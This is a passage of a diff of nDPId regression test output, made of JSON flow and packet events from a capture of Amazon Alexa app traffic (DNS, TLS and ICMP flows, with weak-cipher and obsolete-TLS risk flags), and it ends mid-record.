{"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +01022{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2511,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":133,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976150029,"flow_last_seen":1490976150196,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1490976150196,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45750,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} +00640{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2517,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976022741,"flow_last_seen":1490976022741,"flow_idle_time":140000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1490976150210,"l3_proto":"ip6","src_ip":"::","dst_ip":"ff02::16","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} 
+00649{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2517,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976022731,"flow_last_seen":1490976022731,"flow_idle_time":140000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1490976150210,"l3_proto":"ip6","src_ip":"::","dst_ip":"ff02::1:ffd3:fbc2","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} +00655{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2517,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976027958,"flow_last_seen":1490976030758,"flow_idle_time":140000,"flow_min_l4_payload_len":60,"flow_max_l4_payload_len":60,"flow_tot_l4_payload_len":120,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1490976150210,"l3_proto":"ip4","src_ip":"172.16.42.1","dst_ip":"172.16.42.216","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} +00664{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2517,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1490976023731,"flow_last_seen":1490976031750,"flow_idle_time":140000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1490976150210,"l3_proto":"ip6","src_ip":"fe80::7af8:82ff:fed3:fbc2","dst_ip":"ff02::2","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} 
00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2531,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":134,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976158680,"flow_last_seen":1490976158680,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976158680,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45751,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2531,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":134,"flow_packet_id":1,"flow_last_seen":1490976158680,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976158680,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8\/ohAAEAGSGasECrYNF7ohrK3Abt2joLDAAAAAKAC\/\/8pLAAAAgQFtAQCCAoA9nxLAAAAAAEDAwg="} 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2532,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":134,"flow_packet_id":2,"flow_last_seen":1490976158840,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976158840,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwc8dAAOcGLDM0XuiGrBAq2AG7sreYM6oZdo6CxHASH\/6AKwAAAgQFtAEDAwY="} 
00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2533,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":134,"flow_packet_id":3,"flow_last_seen":1490976158841,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976158841,"pkt":"AMDKkaPvePiC0\/vCCABFAAAo\/olAAEAGSHmsECrYNF7ohrK3Abt2joLEmDOqGlAQAVfKnAAA"} -00859{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2534,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":134,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976158680,"flow_last_seen":1490976158842,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976158842,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45751,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -01022{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2535,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":134,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976158680,"flow_last_seen":1490976159147,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976159147,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45751,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": 
{"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} -00707{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2549,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1490976031691,"flow_last_seen":1490976032855,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1346,"flow_tot_l4_payload_len":2154,"flow_avg_l4_payload_len":215,"midstream":0,"thread_ts_msec":1490976160361,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":49572,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"}} -00653{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976027958,"flow_last_seen":1490976030758,"flow_idle_time":140000,"flow_min_l4_payload_len":60,"flow_max_l4_payload_len":60,"flow_tot_l4_payload_len":120,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1490976160361,"l3_proto":"ip4","src_ip":"172.16.42.1","dst_ip":"172.16.42.216","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} 
-00664{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976032763,"flow_last_seen":1490976032763,"flow_idle_time":140000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1490976160361,"l3_proto":"ip6","src_ip":"fe80::7af8:82ff:fed3:fbc2","dst_ip":"ff02::16","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} -00662{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1490976023731,"flow_last_seen":1490976031750,"flow_idle_time":140000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1490976160361,"l3_proto":"ip6","src_ip":"fe80::7af8:82ff:fed3:fbc2","dst_ip":"ff02::2","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} -00697{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2549,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1490976035553,"flow_last_seen":1490976036358,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":5712,"flow_avg_l4_payload_len":238,"midstream":0,"thread_ts_msec":1490976160361,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"34.199.52.240","src_port":38363,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} +00859{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2534,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":134,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976158680,"flow_last_seen":1490976158842,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976158842,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45751,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +01022{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2535,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":134,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976158680,"flow_last_seen":1490976159147,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976159147,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45751,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} 
+00707{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2549,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1490976031691,"flow_last_seen":1490976032855,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1346,"flow_tot_l4_payload_len":2154,"flow_avg_l4_payload_len":215,"midstream":0,"thread_ts_msec":1490976160361,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":49572,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"}} +00653{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976027958,"flow_last_seen":1490976030758,"flow_idle_time":140000,"flow_min_l4_payload_len":60,"flow_max_l4_payload_len":60,"flow_tot_l4_payload_len":120,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1490976160361,"l3_proto":"ip4","src_ip":"172.16.42.1","dst_ip":"172.16.42.216","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} +00664{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976032763,"flow_last_seen":1490976032763,"flow_idle_time":140000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1490976160361,"l3_proto":"ip6","src_ip":"fe80::7af8:82ff:fed3:fbc2","dst_ip":"ff02::16","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} +00662{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1490976023731,"flow_last_seen":1490976031750,"flow_idle_time":140000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1490976160361,"l3_proto":"ip6","src_ip":"fe80::7af8:82ff:fed3:fbc2","dst_ip":"ff02::2","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} +00697{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2549,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1490976035553,"flow_last_seen":1490976036358,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":5712,"flow_avg_l4_payload_len":238,"midstream":0,"thread_ts_msec":1490976160361,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"34.199.52.240","src_port":38363,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} 
00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2555,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":135,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976164994,"flow_last_seen":1490976164994,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1490976164994,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":64073,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2555,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":135,"flow_packet_id":1,"flow_last_seen":1490976164994,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1490976164994,"pkt":"AMDKkaPvePiC0\/vCCABFAAA+WmBAAEARM1WsECrYrBAqAfpJADUAKhd4KNkBAAABAAAAAAAABWFsZXhhBmFtYXpvbgNjb20AAAEAAQ=="} -00793{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2555,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":135,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976164994,"flow_last_seen":1490976164994,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1490976164994,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":64073,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"},"dns": {"query":"alexa.amazon.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00793{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2555,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":135,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976164994,"flow_last_seen":1490976164994,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1490976164994,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":64073,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"},"dns": {"query":"alexa.amazon.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00543{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2556,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":135,"flow_packet_id":2,"flow_last_seen":1490976165058,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":115,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":115,"pkt_l4_len":81,"thread_ts_msec":1490976165058,"pkt":"ePiC0\/vCAMDKkaPvCABFAABl5+FAAEARpaysECoBrBAq2AA1+kkAUQAZKNmBgAABAAIAAAAABWFsZXhhBmFtYXpvbgNjb20AAAEAAcAMAAUAAQAAAAsACwhwaXRhbmd1acASwC4AAQABAAAABgAENF7ohg=="} -00808{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2556,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":135,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976164994,"flow_last_seen":1490976165058,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":107,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1490976165058,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":64073,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"DNS.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"},"dns": {"query":"alexa.amazon.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.94.232.134"}} +00808{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2556,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":135,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976164994,"flow_last_seen":1490976165058,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":107,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1490976165058,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":64073,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"},"dns": {"query":"alexa.amazon.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.94.232.134"}} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2557,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":136,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976165062,"flow_last_seen":1490976165062,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976165062,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":39750,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2557,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":136,"flow_packet_id":1,"flow_last_seen":1490976165062,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976165062,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8ZaZAAEAG4UisECrYNF7ohptGAbs\/AhtsAAAAAKAC\/\/\/dAQAAAgQFtAQCCAoA9n7KAAAAAAEDAwg="} 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2558,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":136,"flow_packet_id":2,"flow_last_seen":1490976165120,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976165120,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwviBAAOcG4dk0XuiGrBAq2AG7m0ayU5bRPwIbbXASH\/4vqAAAAgQFtAEDAwY="} 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2559,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":136,"flow_packet_id":3,"flow_last_seen":1490976165122,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976165122,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoZadAAEAG4VusECrYNF7ohptGAbs\/AhttslOW0lAQAVd6GQAA"} 
-00952{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2560,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":136,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976165062,"flow_last_seen":1490976165125,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1490976165125,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":39750,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f8f5b71e02603b283e55b50d17ede861","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01100{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2561,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":136,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976165062,"flow_last_seen":1490976165190,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":259,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1490976165190,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":39750,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": 
{"version":"TLSv1","client_requested_server_name":"","ja3":"f8f5b71e02603b283e55b50d17ede861","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA"}} +00952{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2560,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":136,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976165062,"flow_last_seen":1490976165125,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1490976165125,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":39750,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f8f5b71e02603b283e55b50d17ede861","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01100{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2561,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":136,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976165062,"flow_last_seen":1490976165190,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":259,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1490976165190,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":39750,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS 